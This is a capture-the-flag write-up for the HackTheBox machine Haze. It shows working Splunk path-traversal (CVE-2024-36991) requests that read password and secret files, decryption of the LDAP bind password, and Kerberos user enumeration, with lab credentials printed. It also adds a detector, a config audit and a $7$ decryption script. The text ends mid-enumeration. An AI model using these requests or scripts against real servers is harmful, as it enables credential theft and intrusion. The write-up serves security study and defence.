
HackTheBox - Haze

On Haze we exploited a Path Traversal in Splunk Enterprise, reading files from disk to obtain a pair of credentials. With these we enumerated users and then exploited several Active Directory permissions to gain additional access. A Splunk backup gave us access to the dashboard and, by installing scripts, a shell as a new user on the machine. Finally we escalated privileges through SeImpersonatePrivilege.

Name: Haze
OS: Windows
Points: 40
Difficulty: Hard
Release date: 2025-03-29
IP: 10.10.11.61
Maker: EmSec

Rated: user-rated difficulty (bar chart): Cake 29, VeryEasy 23, Easy 85, TooEasy 158, Medium 239, BitHard 294, Hard 528, TooHard 290, ExHard 96, BrainFuck 71

Recon

nmap

nmap shows multiple open ports: DNS (53), Kerberos (88), RPC (135), SMB (139, 445), LDAP/LDAPS (389, 636, 3268, 3269), HTTP (8000), HTTPS (8088, 8089).

# Nmap 7.95 scan initiated Wed Apr  2 02:37:55 2025 as: /usr/lib/nmap/nmap --privileged -p53,88,135,139,389,445,464,593,636,3268,3269,5985,8000,8088,8089,9389,47001,49664,49665,49666,49667,49668,51573,54762,54764,54768,54783,54794,54814,54968 -sV -sC -oN nmap_scan 10.10.11.61
Nmap scan report for 10.10.11.61
Host is up (0.21s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        (generic dns response: SERVFAIL)
| fingerprint-strings: 
|   DNS-SD-TCP: 
|     _services
|     _dns-sd
|     _udp
|_    local
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-04-02 07:51:22Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.haze.htb
| Not valid before: 2025-03-05T07:12:20
|_Not valid after:  2026-03-05T07:12:20
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.haze.htb
| Not valid before: 2025-03-05T07:12:20
|_Not valid after:  2026-03-05T07:12:20
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.haze.htb
| Not valid before: 2025-03-05T07:12:20
|_Not valid after:  2026-03-05T07:12:20
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.haze.htb
| Not valid before: 2025-03-05T07:12:20
|_Not valid after:  2026-03-05T07:12:20
|_ssl-date: TLS randomness does not represent time
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8000/tcp  open  http          Splunkd httpd
| http-robots.txt: 1 disallowed entry 
|_/
| http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_Requested resource was http://10.10.11.61:8000/en-US/account/login?return_to=%2Fen-US%2F
|_http-server-header: Splunkd
8088/tcp  open  ssl/http      Splunkd httpd
|_http-server-header: Splunkd
| http-robots.txt: 1 disallowed entry 
|_/
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2025-03-05T07:29:08
|_Not valid after:  2028-03-04T07:29:08
|_http-title: 404 Not Found
8089/tcp  open  ssl/http      Splunkd httpd
| http-robots.txt: 1 disallowed entry 
|_/
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2025-03-05T07:29:08
|_Not valid after:  2028-03-04T07:29:08
|_http-server-header: Splunkd
|_http-title: splunkd
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
51573/tcp open  msrpc         Microsoft Windows RPC
54762/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
54764/tcp open  msrpc         Microsoft Windows RPC
54768/tcp open  msrpc         Microsoft Windows RPC
54783/tcp open  msrpc         Microsoft Windows RPC
54794/tcp open  msrpc         Microsoft Windows RPC
54814/tcp open  msrpc         Microsoft Windows RPC
54968/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.95%I=7%D=4/2%Time=67ECDB5A%P=x86_64-pc-linux-gnu%r(DNS-S
SF:D-TCP,30,"\0\.\0\0\x80\x82\0\x01\0\0\0\0\0\0\t_services\x07_dns-sd\x04_
SF:udp\x05local\0\0\x0c\0\x01");
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 1h13m24s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-04-02T07:52:29
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Apr  2 02:39:20 2025 -- 1 IP address (1 host up) scanned in 84.09 seconds

SMB & RPC

Neither SMB nor RPC return any information over null sessions.

❯ netexec smb 10.10.11.61 -u "" -p "" --shares
SMB         10.10.11.61     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.61     445    DC01             [+] haze.htb\: 
SMB         10.10.11.61     445    DC01             [-] Error enumerating shares: STATUS_ACCESS_DENIED
❯ rpcclient -N -U "" 10.10.11.61
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
rpcclient $> enumdomgroups
result was NT_STATUS_ACCESS_DENIED
rpcclient $> exit

Splunk

The response headers of the site on port 8000 identify Splunk as the server.

❯ curl -sI 10.10.11.61:8000
HTTP/1.1 303 See Other
Date: Wed, 09 Apr 2025 06:50:23 GMT
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Content-Length: 335
Location: http://10.10.11.61:8000/en-US/
Vary: Accept-Language
Connection: Keep-Alive
X-Frame-Options: SAMEORIGIN
Server: Splunkd

❯ curl -sI http://10.10.11.61:8000/en-US/
HTTP/1.1 303 See Other
Date: Wed, 09 Apr 2025 06:50:33 GMT
Content-Type: text/html;charset=utf-8
X-Content-Type-Options: nosniff
Content-Length: 176
Vary: Accept-Encoding, Cookie
Connection: Keep-Alive
X-Frame-Options: SAMEORIGIN
Location: http://10.10.11.61:8000/en-US/account/login?return_to=%2Fen-US%2F
Set-Cookie: session_id_8000=b49feb42d404aa1d4c36a6ab188d3460722703f7; expires=Wed, 09 Apr 2025 07:50:33 GMT; HttpOnly; Max-Age=3600; Path=/
Server: Splunkd

Visiting the site we find a Splunk Enterprise login page.

image

Port 8089 belongs to the Splunk management components; there we see version 9.2.1.

image

Path Traversal - Splunk

A Path Traversal vulnerability affects versions <= 9.2.2, 9.1.5 and 9.0.10 (Critical Splunk Vulnerability CVE-2024-36991). Version 9.2.1 is affected, so we send the exploitation request for the /etc/passwd file and see its content in the response: it lists four users with their respective password hashes.

GET /en-US/modules/messaging/C:../C:../C:../C:../C:../etc/passwd HTTP/1.1
Host: 10.10.11.61:8000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://10.10.11.61:8000/
Connection: keep-alive
Cookie: session_id_8000=97719c9a018fc572ff5abf88daa5d0451fa29197; splunkweb_uid=C56627AA-8215-4AE4-A7C0-5DC296FE1D5E
If-None-Match: "f2b3290b13bf107a57f507819addbe3f929e9fff"

HTTP/1.1 200 OK
Date: Wed, 02 Apr 2025 08:15:06 GMT
Content-Type: text/html
X-Content-Type-Options: nosniff
Last-Modified: Wed, 05 Mar 2025 07:40:47 GMT
Content-Length: 609
Vary: Accept-Encoding, Cookie
Connection: Keep-Alive
Accept-Ranges: bytes
Set-Cookie: session_id_8000=ad91ad4f1a9227e86c869a92d042c3079b359d4c; expires=Wed, 02 Apr 2025 09:15:06 GMT; HttpOnly; Max-Age=3600; Path=/
Server: Splunkd

:admin:$6$Ak3m7.aHgb/NOQez$O7C8Ck2lg5RaXJs9FrwPr7xbJBJxMCpqIx3TG30Pvl7JSvv0pn3vtYnt8qF4WhL7hBZygwemqn7PBj5dLBm0D1::Administrator:admin:changeme@example.com:::20152
:edward:$6$3LQHFzfmlpMgxY57$Sk32K6eknpAtcT23h6igJRuM1eCe7WAfygm103cQ22/Niwp1pTCKzc0Ok1qhV25UsoUN4t7HYfoGDb4ZCv8pw1::Edward@haze.htb:user:Edward@haze.htb:::20152
:mark:$6$j4QsAJiV8mLg/bhA$Oa/l2cgCXF8Ux7xIaDe3dMW6.Qfobo0PtztrVMHZgdGa1j8423jUvMqYuqjZa/LPd.xryUwe699/8SgNC6v2H/:::user:Mark@haze.htb:::20152
:paul:$6$Y5ds8NjDLd7SzOTW$Zg/WOJxk38KtI.ci9RFl87hhWSawfpT6X.woxTvB4rduL4rDKkE.psK7eXm6TgriABAhqdCPI4P0hcB8xz0cd1:::user:paul@haze.htb:::20152
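As an added example (not part of the original writeup), the following Python detector looks for the request pattern shown above in a web access log: it percent-decodes the request path, normalises backslashes and flags requests to /modules/messaging/ that contain a `C:../` or `../` step. The log lines are constructed to resemble Splunk Web's access log; the exact field layout is an assumption, so adapt LINE_RE to your real log source.

```python
import re
from urllib.parse import unquote

# Constructed sample lines (client - user [timestamp] "METHOD path PROTO" status size).
# Two traversal attempts (one raw, one percent-encoded) and two benign requests.
SAMPLE_LOG = """\
10.10.14.5 - - [02/Apr/2025:08:15:06.000 +0000] "GET /en-US/modules/messaging/C:../C:../C:../C:../C:../etc/passwd HTTP/1.1" 200 609
10.10.14.5 - - [02/Apr/2025:08:16:01.000 +0000] "GET /en-US/modules/messaging/C%3A..%2FC%3A..%2Fetc/auth/splunk.secret HTTP/1.1" 200 254
10.10.14.9 - admin [02/Apr/2025:08:17:30.000 +0000] "GET /en-US/app/launcher/home HTTP/1.1" 200 18231
10.10.14.9 - admin [02/Apr/2025:08:18:02.000 +0000] "GET /en-US/static/js/build/pages/enterprise/a.js HTTP/1.1" 304 0
"""

# Assumed log layout; adjust the groups to match your actual access log.
LINE_RE = re.compile(
    r'^(?P<client>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+)'
)

# A traversal step: ".." as its own path segment, optionally prefixed with a
# drive letter ("C:..") as in the CVE-2024-36991 requests on this page.
TRAVERSAL_RE = re.compile(r'(?:^|/)(?:[A-Za-z]:)?\.\.(?:/|$)')


def is_traversal(path: str) -> bool:
    """Return True if the (possibly URL-encoded) path contains a traversal step."""
    decoded = path
    # Undo nested percent-encoding (e.g. %252E) a few times before matching.
    for _ in range(3):
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    decoded = decoded.replace('\\', '/')
    return bool(TRAVERSAL_RE.search(decoded))


def scan_log(text: str) -> list[dict]:
    """Return one finding per request that looks like a CVE-2024-36991 attempt."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        path = m.group('path')
        if '/modules/messaging/' in path and is_traversal(path):
            findings.append({
                'client': m.group('client'),
                'path': path,
                'status': int(m.group('status')),
                # 200 means the file was actually served, not merely requested.
                'served': m.group('status') == '200',
            })
    return findings


if __name__ == '__main__':
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['client']} {'SERVED' if f['served'] else 'blocked'} {f['path']}")
```

A 200 status on such a request is the signal that matters for incident scoping: it tells you which files were actually read, which on this box included the local user database and, later, the Splunk secrets.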

Hashcat

We tried to crack the hashes, but none of them were in the rockyou wordlist.

PS C:\Users\sckull\Documents\hashcat-6.2.6> .\hashcat.exe -m 1800 ..\hash\splunk_hash_haze rockyou.txt
hashcat (v6.2.6) starting

[..]

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 281 MB

Dictionary cache hit:
* Filename..: rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

Cracking performance lower than expected?

[..]

[s]tatus [p]ause [b]ypass [c]heckpoint [f]inish [q]uit =>

Approaching final keyspace - workload adjusted.

Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 1800 (sha512crypt $6$, SHA512 (Unix))
Hash.Target......: ..\hash\splunk_hash_haze
Time.Started.....: Tue Apr 01 18:44:01 2025 (9 mins, 43 secs)
Time.Estimated...: Tue Apr 01 18:53:44 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:    98459 H/s (0.95ms) @ Accel:1024 Loops:64 Thr:64 Vec:1
Recovered........: 0/4 (0.00%) Digests (total), 0/4 (0.00%) Digests (new), 0/4 (0.00%) Salts
Progress.........: 57377540/57377540 (100.00%)
Rejected.........: 0/57377540 (0.00%)
Restore.Point....: 14344385/14344385 (100.00%)
Restore.Sub.#1...: Salt:3 Amplifier:0-1 Iteration:4992-5000
Candidate.Engine.: Device Generator
Candidates.#1....: $HEX[2151617a40577378] -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#1..: Temp: 53c Fan: 56% Util: 91% Core:2760MHz Mem:8251MHz Bus:8

Started: Tue Apr 01 18:43:49 2025
Stopped: Tue Apr 01 18:53:45 2025
PS C:\Users\sckull\Documents\hashcat-6.2.6>

Kerbrute

We build a wordlist from the users found and run kerbrute against it; only the Administrator user is reported as valid.

❯ /opt/bin/kerbrute userenum -d haze.htb --dc dc01.haze.htb user.txt

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 04/02/25 - Ronnie Flathers @ropnop

2025/04/02 08:16:26 >  Using KDC(s):
2025/04/02 08:16:26 >  	dc01.haze.htb:88

2025/04/02 08:16:26 >  [+] VALID USERNAME:	Administrator@haze.htb
2025/04/02 08:16:26 >  Done! Tested 8 usernames (1 valid) in 0.244 seconds

Splunk Secrets

Splunk has multiple configuration files, among them authentication.conf. Requesting this file we find that LDAP authentication is configured: it shows a name in bindDN and a bindDNpassword value that looks like a password.

GET /en-US/modules/messaging/C:../C:../C:../C:../C:../etc/system/local/authentication.conf HTTP/1.1
Host: 10.10.11.61:8000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://10.10.11.61:8000/
Connection: keep-alive
Cookie: session_id_8000=97719c9a018fc572ff5abf88daa5d0451fa29197; splunkweb_uid=C56627AA-8215-4AE4-A7C0-5DC296FE1D5E
If-None-Match: "f2b3290b13bf107a57f507819addbe3f929e9fff"


[splunk_auth]
minPasswordLength = 8
minPasswordUppercase = 0
minPasswordLowercase = 0
minPasswordSpecial = 0
minPasswordDigit = 0

[Haze LDAP Auth]
SSLEnabled = 0
anonymous_referrals = 1
bindDN = CN=Paul Taylor,CN=Users,DC=haze,DC=htb
bindDNpassword = $7$ndnYiCPhf4lQgPhPu7Yz1pvGm66Nk0PpYcLN+qt1qyojg4QU+hKteemWQGUuTKDVlWbO8pY=
charset = utf8
emailAttribute = mail
enableRangeRetrieval = 0
groupBaseDN = CN=Splunk_LDAP_Auth,CN=Users,DC=haze,DC=htb
groupMappingAttribute = dn
groupMemberAttribute = member
groupNameAttribute = cn
host = dc01.haze.htb
nestedGroups = 0
network_timeout = 20
pagelimit = -1
port = 389
realNameAttribute = cn
sizelimit = 1000
timelimit = 15
userBaseDN = CN=Users,DC=haze,DC=htb
userNameAttribute = samaccountname

[authentication]
authSettings = Haze LDAP Auth
authType = LDAP
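As an added example (not from the writeup), the small audit below parses an authentication.conf in the form shown above and reports the settings that turned this file into a credential leak: a bind password that is only obfuscated with splunk.secret, LDAP binds over cleartext port 389 (SSLEnabled = 0), and a local password policy with no character-class requirements. The sample input is the stanza set recovered on this page (reduced to the keys the checks use); the length threshold of 12 is a local policy choice, not a Splunk default.

```python
import configparser
import io

# Sample input: the authentication.conf recovered in the writeup, trimmed to
# the keys the audit below inspects.
SAMPLE_CONF = """\
[splunk_auth]
minPasswordLength = 8
minPasswordUppercase = 0
minPasswordLowercase = 0
minPasswordSpecial = 0
minPasswordDigit = 0

[Haze LDAP Auth]
SSLEnabled = 0
anonymous_referrals = 1
bindDN = CN=Paul Taylor,CN=Users,DC=haze,DC=htb
bindDNpassword = $7$ndnYiCPhf4lQgPhPu7Yz1pvGm66Nk0PpYcLN+qt1qyojg4QU+hKteemWQGUuTKDVlWbO8pY=
host = dc01.haze.htb
port = 389
userBaseDN = CN=Users,DC=haze,DC=htb
userNameAttribute = samaccountname

[authentication]
authSettings = Haze LDAP Auth
authType = LDAP
"""

COMPLEXITY_KEYS = ('minPasswordUppercase', 'minPasswordLowercase',
                   'minPasswordSpecial', 'minPasswordDigit')


def parse_conf(text: str) -> configparser.ConfigParser:
    """Splunk .conf files are INI-like; keep key case and disable $-interpolation."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.optionxform = str
    cp.read_file(io.StringIO(text))
    return cp


def audit(text: str, min_length: int = 12) -> list[str]:
    """Return a list of findings; an empty list means nothing was flagged."""
    cp = parse_conf(text)
    findings = []

    if cp.has_section('splunk_auth'):
        pol = cp['splunk_auth']
        if int(pol.get('minPasswordLength', '8')) < min_length:
            findings.append(f'splunk_auth: minPasswordLength below {min_length}')
        if all(pol.get(k, '0') == '0' for k in COMPLEXITY_KEYS):
            findings.append('splunk_auth: no character-class requirements')

    # Any stanza with a bindDN is an LDAP strategy stanza.
    for section in cp.sections():
        s = cp[section]
        if 'bindDN' not in s:
            continue
        pw = s.get('bindDNpassword', '')
        if pw and not pw.startswith(('$7$', '$1$')):
            findings.append(f'{section}: bindDNpassword stored in plaintext')
        elif pw:
            # $7$/$1$ values are encrypted with a key derived from splunk.secret,
            # so anyone who can read that file can recover them.
            findings.append(f'{section}: bindDNpassword is only obfuscated; '
                            'anyone who can read splunk.secret can recover it')
        if s.get('SSLEnabled', '0') != '1':
            findings.append(f'{section}: SSLEnabled=0, LDAP binds go in cleartext '
                            f'to {s.get("host", "?")}:{s.get("port", "389")}')
    return findings


if __name__ == '__main__':
    for finding in audit(SAMPLE_CONF):
        print('-', finding)
```

On this box the bind account is also an ordinary domain user whose password was reused elsewhere, which is why a read-only file disclosure turned into domain access; a dedicated bind account with no other logon rights limits that blast radius.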

A reply on the Splunk forum indicates that the bindDNpassword value can be 'reversed' if you know the contents of the splunk.secret file, which we find at /etc/auth/splunk.secret.

GET /en-US/modules/messaging/C:../C:../C:../C:../C:../etc/auth/splunk.secret HTTP/1.1
Host: 10.10.11.61:8000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://10.10.11.61:8000/
Connection: keep-alive
Cookie: session_id_8000=97719c9a018fc572ff5abf88daa5d0451fa29197; splunkweb_uid=C56627AA-8215-4AE4-A7C0-5DC296FE1D5E
If-None-Match: "f2b3290b13bf107a57f507819addbe3f929e9fff"


HTTP/1.1 200 OK
Date: Wed, 02 Apr 2025 08:38:34 GMT
Content-Type: text/html
X-Content-Type-Options: nosniff
Last-Modified: Wed, 05 Mar 2025 07:29:08 GMT
Content-Length: 254
Vary: Accept-Encoding, Cookie
Connection: Keep-Alive
Accept-Ranges: bytes
Set-Cookie: session_id_8000=de2c77673ebc5d0db0e1f3fa93a7889c7a098f00; expires=Wed, 02 Apr 2025 09:38:34 GMT; HttpOnly; Max-Age=3600; Path=/
Server: Splunkd

NfKeJCdFGKUQUqyQmnX/WM9xMn5uVF32qyiofYPHkEOGcpMsEN.lRPooJnBdEL5Gh2wm12jKEytQoxsAYA5mReU9.h0SYEwpFMDyyAuTqhnba9P2Kul0dyBizLpq6Nq5qiCTBK3UM516vzArIkZvWQLk3Bqm1YylhEfdUvaw1ngVqR1oRtg54qf4jG0X16hNDhXokoyvgb44lWcH33FrMXxMvzFKd5W3TaAUisO6rnN0xqB7cHbofaA1YV9vgD

To recover the password we use the splunksecrets tool.

# https://github.com/HurricaneLabs/splunksecrets
❯ splunksecrets --help
Usage: splunksecrets [OPTIONS] COMMAND [ARGS]...

Options:
  --help  Show this message and exit.

Commands:
  dbconnect-decrypt      Decrypt password used for dbconnect identity
  dbconnect-encrypt      Encrypt password used for dbconnect identity
  phantom-decrypt        Decrypt password used for Phantom asset
  phantom-encrypt        Encrypt password used for Phantom asset
  splunk-decrypt         Decrypt password using Splunk 7.2 algorithm
  splunk-encrypt         Encrypt password using Splunk 7.2 algorithm
  splunk-hash-passwd     Generate password hash for use in...
  splunk-legacy-decrypt  Decrypt password using legacy Splunk algorithm...
  splunk-legacy-encrypt  Encrypt password using legacy Splunk algorithm...

We run the tool specifying the secret file and the 'ciphertext', and obtain the plaintext password.

❯ splunksecrets splunk-decrypt --help
Usage: splunksecrets splunk-decrypt [OPTIONS]

  Decrypt password using Splunk 7.2 algorithm

Options:
  -S, --splunk-secret TEXT  [required]
  --ciphertext TEXT
  --help                    Show this message and exit.
❯ splunksecrets splunk-decrypt -S splunk.secrets --ciphertext '$7$ndnYiCPhf4lQgPhPu7Yz1pvGm66Nk0PpYcLN+qt1qyojg4QU+hKteemWQGUuTKDVlWbO8pY='
Ld@p_Auth_Sp1unk@2k24
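To make clear why a readable splunk.secret is equivalent to a readable password, here is an added example (not part of the writeup, and not the splunksecrets code itself) that re-implements the "$7$" scheme as that tool's splunk-decrypt applies it, reconstructed from memory: one PBKDF2-HMAC-SHA256 iteration over the first 254 bytes of splunk.secret with the fixed salt "disk-encryption" yields an AES-256 key, and the base64 blob is a 16-byte IV followed by AES-GCM ciphertext and tag. It needs the third-party `cryptography` package. The round-trip uses a constructed secret; running the block's main against the page's secret and bindDNpassword should print the same password splunksecrets recovered.

```python
import base64
import hashlib
from cryptography.hazmat.primitives.ciphers.aead import AESGCM

# Parameters of the "$7$" scheme (as implemented by splunksecrets' splunk-decrypt).
SALT = b"disk-encryption"
MAX_SECRET_LEN = 254   # only the first 254 bytes of splunk.secret are used
IV_LEN = 16            # leading bytes of the decoded blob

# Values taken from this page: the recovered splunk.secret and bindDNpassword.
PAGE_SECRET = (
    "NfKeJCdFGKUQUqyQmnX/WM9xMn5uVF32qyiofYPHkEOGcpMsEN.lRPooJnBdEL5Gh2wm12jKEytQoxs"
    "AYA5mReU9.h0SYEwpFMDyyAuTqhnba9P2Kul0dyBizLpq6Nq5qiCTBK3UM516vzArIkZvWQLk3Bqm1Y"
    "ylhEfdUvaw1ngVqR1oRtg54qf4jG0X16hNDhXokoyvgb44lWcH33FrMXxMvzFKd5W3TaAUisO6rnN0xq"
    "B7cHbofaA1YV9vgD"
)
PAGE_CIPHERTEXT = "$7$ndnYiCPhf4lQgPhPu7Yz1pvGm66Nk0PpYcLN+qt1qyojg4QU+hKteemWQGUuTKDVlWbO8pY="


def derive_key(splunk_secret: str) -> bytes:
    """One PBKDF2 round over the trimmed secret: no work factor at all, so the
    key is exactly as secret as the file it is derived from."""
    secret = splunk_secret.strip().encode()[:MAX_SECRET_LEN]
    return hashlib.pbkdf2_hmac("sha256", secret, SALT, 1, dklen=32)


def decrypt_7(splunk_secret: str, value: str) -> str:
    """Reverse a $7$ value: base64 -> IV || ciphertext || GCM tag -> AES-256-GCM."""
    if not value.startswith("$7$"):
        raise ValueError("not a $7$ value")
    blob = base64.b64decode(value[3:])
    iv, body = blob[:IV_LEN], blob[IV_LEN:]   # AESGCM takes ciphertext||tag as one buffer
    return AESGCM(derive_key(splunk_secret)).decrypt(iv, body, None).decode()


def encrypt_7(splunk_secret: str, plaintext: str, iv: bytes) -> str:
    """Forward direction, used here to round-trip a constructed value."""
    if len(iv) != IV_LEN:
        raise ValueError("IV must be 16 bytes")
    body = AESGCM(derive_key(splunk_secret)).encrypt(iv, plaintext.encode(), None)
    return "$7$" + base64.b64encode(iv + body).decode()


if __name__ == "__main__":
    try:
        print(decrypt_7(PAGE_SECRET, PAGE_CIPHERTEXT))
    except Exception as exc:   # wrong secret or damaged blob: the GCM tag check fails
        print("decryption failed:", exc)
```

The design lesson is that "$7$" is reversible encryption, not hashing: the protection it offers is exactly the filesystem ACL on splunk.secret, so that file must be treated (backed up, permissioned and rotated) as the credential it effectively is.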

User - paul.taylor

None of the known users accepts this password in Splunk or in any other service on the machine. From the known users and the DNs found we generate a username wordlist with the usernames.py script.

❯ python usernames.py user.txt > new_users.txt
❯ wc -l new_users.txt
80 new_users.txt

We run kerbrute again and see that paul.taylor is valid.

❯ /opt/bin/kerbrute userenum -d haze.htb --dc dc01.haze.htb new_users.txt

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 04/02/25 - Ronnie Flathers @ropnop

2025/04/02 07:13:48 >  Using KDC(s):
2025/04/02 07:13:48 >  	dc01.haze.htb:88

2025/04/02 07:13:48 >  [+] VALID USERNAME:	paul.taylor@haze.htb
2025/04/02 07:13:50 >  Done! Tested 80 usernames (1 valid) in 1.713 seconds

The username and password pair is accepted by both SMB and LDAP.

❯ netexec ldap 10.10.11.61 -u paul.taylor -p 'Ld@p_Auth_Sp1unk@2k24'
SMB         10.10.11.61     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.61     389    DC01             [+] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24 
❯ netexec smb 10.10.11.61 -u paul.taylor -p 'Ld@p_Auth_Sp1unk@2k24'
SMB         10.10.11.61     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.61     445    DC01             [+] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24 

Bloodhound

We ran the bloodhound-ce collector; its output shows only three users.

❯ python bloodhound.py -u paul.taylor -p 'Ld@p_Auth_Sp1unk@2k24' -d haze.htb -dc dc01.haze.htb -ns 10.10.11.61 -c all --zip
INFO: BloodHound.py for BloodHound Community Edition
INFO: Found AD domain: haze.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.haze.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.haze.htb
INFO: Found 3 users
INFO: Found 32 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 18 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc01.haze.htb
INFO: Done in 00M 41S
INFO: Compressing output into 20250402113722_bloodhound.zip

We start bloodhound-ce and load the zip file. For some reason the information is "incomplete": in some cases only the SID of a group/user is shown, as seen for user Paul, whose group SID resolves to Domain Users.

Paul.Taylor

rpcclient $> lookupsids S-1-5-21-323145914-28650650-2368316563-513
S-1-5-21-323145914-28650650-2368316563-513 HAZE\Domain Users (2)
rpcclient $>

This "problem" persisted throughout the machine, so bloodhound was run again for every user we gained access to. It is possible that each user has restrictions or limitations on what it can read about other users/groups.

image

Haze-it-backup

Among the users bloodhound found is haze-it-backup.

❯ jq -r '.data[].Properties.name' 20250402113722_users.json
NT AUTHORITY@HAZE.HTB
HAZE-IT-BACKUP$@HAZE.HTB
PAUL.TAYLOR@HAZE.HTB

No interesting group is shown for this user.

image

User - mark.adams

Users

Running netexec to enumerate users shows only one user.

❯ netexec ldap 10.10.11.61 -u paul.taylor -p 'Ld@p_Auth_Sp1unk@2k24' --users
SMB         10.10.11.61     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.61     389    DC01             [+] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24 
LDAP        10.10.11.61     389    DC01             [*] Enumerated 1 domain users: haze.htb
LDAP        10.10.11.61     389    DC01             -Username-                    -Last PW Set-       -BadPW- -Description-                                               
LDAP        10.10.11.61     389    DC01             paul.taylor                   2025-04-09 09:16:39 0                                                                   

Running netexec with the --rid-brute flag shows more groups and users than bloodhound found.

